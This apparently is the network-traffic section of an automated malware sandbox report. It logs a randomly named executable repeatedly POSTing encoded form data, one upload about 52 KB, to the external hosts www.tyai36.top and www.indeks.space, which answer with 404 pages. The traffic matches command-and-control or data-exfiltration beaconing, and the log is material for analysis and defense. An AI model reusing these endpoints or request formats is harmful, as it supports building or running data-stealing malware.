                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 75 42 6c 59 77 2f 44 78 48 63 6f 4d 48 70 62 75 38 74 48 54 68 79 76 38 2b 55 38 63 68 59 49 46 65 67 32 7a 61 48 4c 7a 41 72 6f 51 30 2f 47 51 67 4e 78 77 4a 67 52 45 36 4f 2f 45 31 49 6d 46 68 7a 43 68 64 30 65 57 32 6a 50 39 54 31 42 79 7a 77 5a 4a 66 33 31 53 6f 41 53 76 4f 55 66 39 63 6f 36 66 36 57 51 6c 36 47 33 4c 4b 63 63 45 35 48 31 6f 49 55 59 39 5a 75 31 65 58 4a 48 58 46 7a 4c 4e 6e 43 56 44 62 4e 4d 2b 7a 39 6b 43 61 45 4d 69 53 62 45 59 6e 6c 39 38 72 39 4e 55 51 48 4d 6c 68 79 46 34 6f 7a 49 57 6b 34 57 6e 67 73 61 2f 4c 61 7a 41 43 79 32 63 66 76 35 51 2f 51 3d 3d
                                                                                  Data Ascii: AvLLLbOh=uBlYw/DxHcoMHpbu8tHThyv8+U8chYIFeg2zaHLzAroQ0/GQgNxwJgRE6O/E1ImFhzChd0eW2jP9T1ByzwZJf31SoASvOUf9co6f6WQl6G3LKccE5H1oIUY9Zu1eXJHXFzLNnCVDbNM+z9kCaEMiSbEYnl98r9NUQHMlhyF4ozIWk4Wngsa/LazACy2cfv5Q/Q==
                                                                                  Aug 27, 2024 17:47:18.965771914 CEST302INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:47:18 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b12d1b-8a"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.11.204981738.47.207.120805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:47:21.529053926 CEST1122OUTPOST /7te8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.tyai36.top
                                                                                  Origin: http://www.tyai36.top
                                                                                  Referer: http://www.tyai36.top/7te8/
                                                                                  Content-Length: 545
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 75 42 6c 59 77 2f 44 78 48 63 6f 4d 42 4a 72 75 2b 4d 48 54 6e 53 76 2f 37 55 38 63 76 34 49 42 65 67 71 7a 61 44 37 6a 48 59 4d 51 31 65 32 51 6e 49 64 77 4f 67 52 45 69 65 2f 42 32 34 6d 4f 68 7a 66 42 64 30 53 57 32 6a 4c 39 42 33 35 79 69 77 5a 4b 51 58 31 54 72 41 53 69 5a 45 66 4e 63 6f 32 44 36 58 30 6c 36 32 62 4c 62 75 45 45 75 43 4a 76 4d 30 59 37 66 75 31 64 4f 5a 48 4a 46 7a 33 76 6e 44 39 54 62 2b 51 2b 7a 64 45 43 5a 45 4d 68 61 72 45 66 72 46 38 70 6d 50 39 65 54 30 45 59 6e 79 74 39 76 42 30 35 6e 66 36 2f 69 73 6d 48 55 4c 50 6a 44 43 50 33 4b 63 55 46 37 44 52 6c 75 39 76 44 74 46 71 56 64 6b 62 37 6d 4b 57 69 43 36 7a 41 2f 79 52 30 30 77 4a 4a 6a 33 34 41 36 2f 58 74 44 39 65 6c 6d 54 59 4c 51 78 6f 34 52 59 33 6e 5a 75 68 72 4c 36 47 67 36 73 44 6b 42 42 71 54 4d 4c 75 44 37 42 64 71 44 65 51 77 4c 47 5a 53 34 42 6c 5a 4d 63 48 59 36 5a 7a 41 6a 78 56 35 38 51 4b 56 70 34 37 46 4a 64 51 4f 67 49 47 4b 47 74 72 6f 6e 69 70 5a 78 57 71 6c 44 51 6e 4f 41 [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=uBlYw/DxHcoMBJru+MHTnSv/7U8cv4IBegqzaD7jHYMQ1e2QnIdwOgREie/B24mOhzfBd0SW2jL9B35yiwZKQX1TrASiZEfNco2D6X0l62bLbuEEuCJvM0Y7fu1dOZHJFz3vnD9Tb+Q+zdECZEMharEfrF8pmP9eT0EYnyt9vB05nf6/ismHULPjDCP3KcUF7DRlu9vDtFqVdkb7mKWiC6zA/yR00wJJj34A6/XtD9elmTYLQxo4RY3nZuhrL6Gg6sDkBBqTMLuD7BdqDeQwLGZS4BlZMcHY6ZzAjxV58QKVp47FJdQOgIGKGtronipZxWqlDQnOA7HnTZNYuZsQMFBC26G1ggrA5dn9F8wm8rZ9CcWEI9sWUk6xo/g03K/oJJdCcVbgJypFxX/tARlyVhj1uwFjERhAdGRVltiCVIEcgIl080yaie1fME2LLmq5/SZ7uGZ2Xc5hpdRcYIAikjo4L13+KS1YH1i0oZP4kIquAqUF0FmzY9mP2N34omTGHAd6GegCSTXrAe1W6GuipCA=
                                                                                  Aug 27, 2024 17:47:21.852082968 CEST302INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:47:21 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b12d1b-8a"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.11.204981838.47.207.120805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:47:24.369869947 CEST2578OUTPOST /7te8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.tyai36.top
                                                                                  Origin: http://www.tyai36.top
                                                                                  Referer: http://www.tyai36.top/7te8/
                                                                                  Content-Length: 52933
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 75 42 6c 59 77 2f 44 78 48 63 6f 4d 42 4a 72 75 2b 4d 48 54 6e 53 76 2f 37 55 38 63 76 34 49 42 65 67 71 7a 61 44 37 6a 48 59 45 51 30 73 2b 51 68 72 6c 77 50 67 52 45 38 4f 2f 41 32 34 6d 70 68 7a 58 65 64 30 75 47 32 68 44 39 42 67 39 79 69 69 42 4b 41 48 31 51 75 41 53 67 4f 55 66 5a 63 6f 36 70 36 58 52 51 36 47 76 4c 4b 5a 67 45 35 6c 64 6f 45 45 59 39 66 75 31 42 4b 5a 48 42 46 7a 7a 2f 6e 44 68 54 62 39 6b 2b 68 65 38 43 4b 48 6b 68 58 62 45 63 68 6c 38 79 73 76 38 75 54 30 67 6d 6e 79 74 4c 76 44 59 35 6e 59 75 2f 73 50 4f 45 55 72 50 6a 4c 69 50 30 62 4d 59 42 37 44 4e 74 75 39 72 44 74 48 71 56 64 45 62 37 32 37 57 6a 53 71 7a 61 6f 69 52 64 77 77 56 42 6a 33 73 71 36 2f 44 74 44 4e 69 6c 38 41 41 4c 53 56 38 34 63 59 33 66 58 4f 68 43 42 61 47 38 36 74 79 48 42 46 57 70 4d 4a 43 44 36 67 39 71 52 76 51 7a 62 32 59 62 30 68 6b 42 47 4d 62 45 36 59 65 44 6a 78 55 6b 38 56 71 56 70 4c 7a 46 49 63 51 42 6a 59 47 4a 4b 4e 72 39 70 43 31 48 78 57 47 74 44 54 6e 65 41 [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=uBlYw/DxHcoMBJru+MHTnSv/7U8cv4IBegqzaD7jHYEQ0s+QhrlwPgRE8O/A24mphzXed0uG2hD9Bg9yiiBKAH1QuASgOUfZco6p6XRQ6GvLKZgE5ldoEEY9fu1BKZHBFzz/nDhTb9k+he8CKHkhXbEchl8ysv8uT0gmnytLvDY5nYu/sPOEUrPjLiP0bMYB7DNtu9rDtHqVdEb727WjSqzaoiRdwwVBj3sq6/DtDNil8AALSV84cY3fXOhCBaG86tyHBFWpMJCD6g9qRvQzb2Yb0hkBGMbE6YeDjxUk8VqVpLzFIcQBjYGJKNr9pC1HxWGtDTneA8fnV5NYq+YTC1Ar06Gn/Qrt5drhF9lE7YN9CsGEPtsVE072mfgpzK/oJJRWcVXgKHFFwnPtSSdyXhjzuwFyERl7dGZvltS4VLocjd509Fyb1u0XIE2QIW2q/U9zuC9mXuNh7NBccIAtyzpyOF29bC4ZH1+OoYq1kISuFMhfpQGlFMXE8OjcuHCRPDNwH+13RWLIHtl3m1vg/WhWkd3mZ464amb432jrRBoVkpWQaRo/S2JmNzCs2LwAJw23czx0r8kjgEHUQ8EkBB+ZTVc3HcaDMBdBgaItL0G7zpRiheVi8qquDPW22S64YaUz0iQd/Nx+h877hx+vV9k0R18rXVDIcwbwbMpvjX5ka7tsUSiF6f5LT2yeUexDoqNnrPNXdR9G4Bq4mHlGfPoFDb29p05R+RnyPorcNMNh+TrBnGA3ek2exHf169//1jmEjd4MOppwQ4q3CSPup24nVBmd8VBNyVpTQFUJzs/h7AVZAALet3wNbk+Jbq8vFoEFtSfYNtu9IO5q5uy1VhlUA6K+ckqce6rsTzwf88xfMtH0jHlDIlK42/Wuva3karx4Ur7YUttrvFXMAnrNApg1RGLKp9XzSczoQjGUEuEKs9e9ql294GuIYUYe5WeROI30WFVMpoY8ohXeGX20v0AV0pE54bt56RSh0pTaGYP [TRUNCATED]
                                                                                  Aug 27, 2024 17:47:24.369893074 CEST2578OUTData Raw: 72 45 34 68 2b 51 63 74 52 47 70 54 57 75 79 48 7a 46 36 64 62 7a 59 76 38 33 71 54 50 76 44 74 77 57 4c 69 54 47 54 4a 67 4c 69 38 67 37 76 42 4b 31 6c 2f 61 70 74 69 6c 51 30 4c 6a 69 54 69 4c 57 56 38 46 58 4a 4a 5a 5a 49 37 63 41 6d 5a 75 4b
                                                                                  Data Ascii: rE4h+QctRGpTWuyHzF6dbzYv83qTPvDtwWLiTGTJgLi8g7vBK1l/aptilQ0LjiTiLWV8FXJJZZI7cAmZuKQwVEylqW3bH9WKxjnr2Tg0vHDHGzcYpO6Uxjbu07IZnATmnbcsDcZ6s6CfQjTKYoC6gQI2Cdm8jPC8a5m1P9xMYePPFnfFk5l+/Jwn/uRAj8OCV4zsj5rtGgwfp90AYBlTEtZMpPlUWSR0Bjiz8RPfv7FKnt7c8bX
                                                                                  Aug 27, 2024 17:47:24.369951963 CEST7734OUTData Raw: 30 6f 6d 76 52 2b 58 68 45 68 54 5a 6c 42 66 67 34 41 31 47 6b 66 69 53 45 61 63 68 33 4f 42 65 4b 32 37 74 67 6d 37 78 2b 46 6c 53 4d 49 30 43 35 35 6a 78 42 43 4c 76 66 64 6d 78 55 63 35 51 50 7a 45 6f 71 6b 48 30 42 66 48 47 2b 46 61 34 43 51
                                                                                  Data Ascii: 0omvR+XhEhTZlBfg4A1GkfiSEach3OBeK27tgm7x+FlSMI0C55jxBCLvfdmxUc5QPzEoqkH0BfHG+Fa4CQG4iPxyoi+Ww5qoe8Hqj5l4zeyoEzN2ZbRwf4QZRIYdWVCListdVu8n5UxdI+QOEVJn3xXuNYVhk6urtSCZQvVB9wkKzJE1//zXP/uQA8jo7MXNOpZNzp1kj/1THvlBCnRCfCKt6MdV9kMgkKnD/D+FBQzGdJgIjIP
                                                                                  Aug 27, 2024 17:47:24.671295881 CEST302INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:47:24 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b12d1b-8a"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                  Aug 27, 2024 17:47:24.671410084 CEST1289OUTData Raw: 69 6e 5a 70 57 41 38 50 52 5a 70 77 7a 33 2b 31 4d 4f 5a 4a 6b 58 4c 74 4e 70 42 74 7a 31 62 4f 39 4f 34 2f 6d 74 4d 32 53 55 51 54 63 39 4d 54 61 5a 30 6c 63 77 33 4f 76 4c 4a 67 74 51 6a 71 39 4b 4f 70 41 6f 4d 6b 34 4d 48 43 6c 39 49 33 54 4d
                                                                                  Data Ascii: inZpWA8PRZpwz3+1MOZJkXLtNpBtz1bO9O4/mtM2SUQTc9MTaZ0lcw3OvLJgtQjq9KOpAoMk4MHCl9I3TMMS8u7v5OuBQFgaviAWe+LhUHp17DHWRkfJLqJB8uE2LjFFD79adD/9RV4fIInH0s6eIrdzcBOCuLj5MJtKLtpDHShdIFTHNnib0uWgecpdGtWJY6r2AwtETq8+9CcamN1oUdOfk4pnxFKGXLxz183tj7+Sj8r42EQ
                                                                                  Aug 27, 2024 17:47:24.671458006 CEST1289OUTData Raw: 41 50 6a 57 48 30 64 72 4d 45 48 4a 79 38 70 39 64 50 42 4d 55 6f 6c 45 56 48 64 48 73 43 36 46 69 37 38 75 54 43 64 38 63 62 46 42 45 69 64 49 74 72 4a 6b 6c 4a 65 37 78 61 45 31 56 72 72 2b 4c 50 55 4f 2b 4e 4c 58 6b 4e 39 61 71 39 2f 55 44 54
                                                                                  Data Ascii: APjWH0drMEHJy8p9dPBMUolEVHdHsC6Fi78uTCd8cbFBEidItrJklJe7xaE1Vrr+LPUO+NLXkN9aq9/UDTYdPivc47n0zyLIIn42H9Mmhoc4SFS2Ng9W2LGlbIqB/T86lr7CSlHRIuS1fcfc+ZchOoi1bJJqhq4RCmyF58lMsNOY8HxRkbBfZhcdhLaA2JDootzoaefYvfH98gvxn3M44C+N9gK3h/fb4SzBoDrTdzLiHZtMJbh
                                                                                  Aug 27, 2024 17:47:24.671678066 CEST5156OUTData Raw: 73 6b 69 75 68 2f 69 54 75 50 75 31 39 6d 68 4b 38 68 56 57 6f 33 7a 67 4e 62 69 33 43 4d 34 64 46 58 34 68 78 67 35 50 2b 64 49 33 73 2f 54 56 65 66 5a 71 71 39 6e 65 59 43 5a 73 74 4a 4c 7a 4c 72 38 31 5a 7a 6b 6a 6d 37 62 61 7a 53 61 4a 57 49
                                                                                  Data Ascii: skiuh/iTuPu19mhK8hVWo3zgNbi3CM4dFX4hxg5P+dI3s/TVefZqq9neYCZstJLzLr81Zzkjm7bazSaJWIz6WGdrbSj4cgpVcYl7oZ+aoYsYi1LrQl5wjfhNlp2DxTbwipZ/ahNwO2aauvQicyxVb7Y+xH0qlHVKjqR/XAsD/yFFfAfKmwQd6zXs3A7P8c4QSwh+iLg+xOmPWO8ItVACJnl9Lf7qYOCHT0ScPLyCnRYMve2agKE
                                                                                  Aug 27, 2024 17:47:24.672020912 CEST5156OUTData Raw: 76 30 2f 47 37 63 42 37 62 74 2b 6f 63 52 6a 44 77 6d 53 46 65 4f 4f 57 7a 68 41 61 6b 52 50 72 75 44 6c 42 4d 66 78 50 4e 32 31 72 74 4e 70 59 6f 65 33 50 44 35 6c 53 2f 67 74 65 35 74 7a 74 33 6a 6f 58 31 50 55 75 42 6e 6e 33 76 42 59 4a 52 59
                                                                                  Data Ascii: v0/G7cB7bt+ocRjDwmSFeOOWzhAakRPruDlBMfxPN21rtNpYoe3PD5lS/gte5tzt3joX1PUuBnn3vBYJRYKmimK6eec2gd+4/sVIFXCmtyEQdMh8w1tnsnfHQKqFN3n7z65p0C7XOXSLtxi3BFsizdYWMNLTYYJMv7UQDhCy2IF8g3wxsxZIaChgmYsW9+8jvkSFpjtk7ZSD3qA5Q00DUbtWo0l3qodcjQWGUe6o7uo8xqC77hL
                                                                                  Aug 27, 2024 17:47:24.672305107 CEST3867OUTData Raw: 4b 52 59 42 2f 4f 63 30 33 31 4e 74 4a 30 37 32 49 59 55 64 4f 37 73 65 35 39 62 2b 6e 79 6a 47 70 79 49 31 57 30 4e 44 6d 37 7a 31 4f 37 67 6f 35 77 6a 64 79 42 50 67 46 6c 44 65 59 66 43 78 74 69 7a 39 35 63 61 6f 70 5a 55 4a 4b 45 71 6a 47 6f
                                                                                  Data Ascii: KRYB/Oc031NtJ072IYUdO7se59b+nyjGpyI1W0NDm7z1O7go5wjdyBPgFlDeYfCxtiz95caopZUJKEqjGoHwRg2ItXIG9SHmAk+gNZl6XxwIby7v/LrpTOjvaa7LCQgbFVchBKz+JwhztMvQW5qS5qcWURMtVfkqzi1586PZ48jk/PU7r+SFjIp3tJpJZB0dqRrnqWicVue7E6h7+ClDGazQbdpFgIWbx+7AvGKVlEfbYj61RbU
                                                                                  Aug 27, 2024 17:47:24.672363043 CEST3867OUTData Raw: 6f 4b 58 31 77 42 59 72 78 67 45 6c 72 48 6c 55 39 79 35 53 4a 44 67 61 6e 74 42 4f 6c 6a 76 53 76 49 2f 6e 53 50 31 68 50 69 62 50 47 55 32 54 64 39 6a 49 30 52 42 32 6e 54 77 74 2f 39 4f 4f 59 6a 4e 62 61 55 46 66 4e 6d 5a 4f 45 45 6e 33 47 38
                                                                                  Data Ascii: oKX1wBYrxgElrHlU9y5SJDgantBOljvSvI/nSP1hPibPGU2Td9jI0RB2nTwt/9OOYjNbaUFfNmZOEEn3G8kN5DMdpdJhdqLWHAMJYTkDELAgagfMzKslg8Mc0YSFoe4I9ccUjEzFmXtu0C6Tto/InadF1oGRqubmKWVy67i4AvfYseKKLroW8jKExipZakyXmV3V6Hop8SLh2NqsOscO2URm0jRd8qhmJ3qFRGkqJ41NWVVdCnf
                                                                                  Aug 27, 2024 17:47:24.673413038 CEST1289OUTData Raw: 7a 75 4b 76 56 34 45 48 38 32 76 32 36 65 44 31 53 59 68 79 4b 6e 76 38 38 6c 35 7a 39 32 53 59 73 4d 53 6f 6e 6d 67 6b 2b 58 35 79 30 4c 47 34 54 2b 56 65 41 53 78 59 56 42 54 4c 78 39 6d 75 73 50 6e 47 32 73 47 73 51 35 78 71 31 34 45 78 6c 36
                                                                                  Data Ascii: zuKvV4EH82v26eD1SYhyKnv88l5z92SYsMSonmgk+X5y0LG4T+VeASxYVBTLx9musPnG2sGsQ5xq14Exl63L4+TjbH4JKYRGSbtE8emm+yz5MGz5H3d4q8zAtcAreYk23ZZyriWp2uLKF5kTfV300zb1A9P8qWSSSqkI4Hw7dL7E6ccYILNCSXAjlffN+9dTtemHTNvAWCEYpBT3tzwZVuFJSyzWj28bQ1L/NBIMpUj14DIwpiY
                                                                                  Aug 27, 2024 17:47:24.673461914 CEST3867OUTData Raw: 58 6f 31 63 2f 59 46 6e 32 66 47 44 58 69 68 4c 6f 4d 42 6a 31 61 69 46 55 69 73 74 56 4d 6e 30 46 4f 6a 46 76 52 71 51 73 39 4a 79 31 54 34 32 4f 54 43 45 4f 35 42 78 67 41 32 7a 77 4b 42 31 31 75 35 31 6a 32 79 52 2b 6a 70 6d 6a 35 74 65 6d 61
                                                                                  Data Ascii: Xo1c/YFn2fGDXihLoMBj1aiFUistVMn0FOjFvRqQs9Jy1T42OTCEO5BxgA2zwKB11u51j2yR+jpmj5temaJaiW21gvQaOFjKUD5kScoYADwhvgBkDwaDKreFRNBTJ/BfSlIJMCUWkH35tI5EbvrWv04v8YxtHhzcCxIih3cvXhuUV6m3LDlJWFdyu5/3coF5tyIc4LztFCgOaAQBV+wU+QyyNiM0Gz750flX5jbo0Tk+PRp4R4r


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.11.204981938.47.207.120805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:47:27.213629007 CEST523OUTGET /7te8/?AvLLLbOh=jDN4zPqbFf9yM+3zgc/bkSOt3FtgrIUvIR/YWyCTW7MfoJq2/oprJylb09/bpIujsG26CmWa4QbZN3EYlCF2dF9UrXrnLyDZVZ+LwV0bzVblUs0ijF56Mzs=&7RB=66nPyLG8 HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.tyai36.top
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Aug 27, 2024 17:47:27.521915913 CEST302INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:47:27 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b12d1b-8a"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.11.2049820194.58.112.174805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:47:41.402327061 CEST788OUTPOST /1fqp/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.indeks.space
                                                                                  Origin: http://www.indeks.space
                                                                                  Referer: http://www.indeks.space/1fqp/
                                                                                  Content-Length: 205
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 33 6f 34 52 6c 39 50 4d 34 48 42 32 71 55 77 6e 48 39 59 49 52 30 54 66 56 38 2b 39 64 6e 39 55 62 4d 68 63 61 57 67 67 43 4a 36 44 37 34 69 75 77 76 59 61 33 51 66 68 77 66 4d 59 64 36 55 67 34 54 53 45 45 75 79 47 66 73 75 33 49 52 50 67 6f 77 79 62 48 4a 44 65 73 4c 47 47 59 46 74 71 6f 46 76 37 56 77 6b 59 43 55 49 62 4e 35 7a 49 39 5a 45 47 6a 53 42 52 64 4d 31 62 64 48 62 48 61 74 46 4a 43 45 4b 6f 68 6b 47 57 73 66 50 4b 4f 41 63 4f 7a 30 69 55 47 6d 63 50 66 75 59 48 37 39 2f 33 72 62 59 34 36 6f 57 38 31 2b 36 49 4b 79 4a 7a 7a 56 76 67 6c 79 7a 61 71 55 38 67 52 41 3d 3d
                                                                                  Data Ascii: AvLLLbOh=3o4Rl9PM4HB2qUwnH9YIR0TfV8+9dn9UbMhcaWggCJ6D74iuwvYa3QfhwfMYd6Ug4TSEEuyGfsu3IRPgowybHJDesLGGYFtqoFv7VwkYCUIbN5zI9ZEGjSBRdM1bdHbHatFJCEKohkGWsfPKOAcOz0iUGmcPfuYH79/3rbY46oW81+6IKyJzzVvglyzaqU8gRA==
                                                                                  Aug 27, 2024 17:47:41.623388052 CEST1289INData Raw: ae 56 4e 38 6a 6b 93 e7 92 b4 7d 30 dd 00 f1 d1 53 18 f7 cf 88 7a f7 93 2f e1 22 8f 93 cf e3 ef 44 4e aa 77 93 cf 75 78 a4 e2 ba 05 e2 4c f1 cc d1 6a 94 a7 b4 05 6a d8 50 32 1a 05 4a 27 7a 93 d5 65 ac d3 ca ea 0d 07 76 24 bd 2f 50 c3 fe 0e 19 c8
                                                                                  Data Ascii: VN8jk}0Sz/"DNwuxLjjP2J'zev$/PB[$Pzi(wA#`a1%wtZD7(.kLYyZdB&-@VPZcN2cn)<5=f
                                                                                  Aug 27, 2024 17:47:41.623506069 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:47:41 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 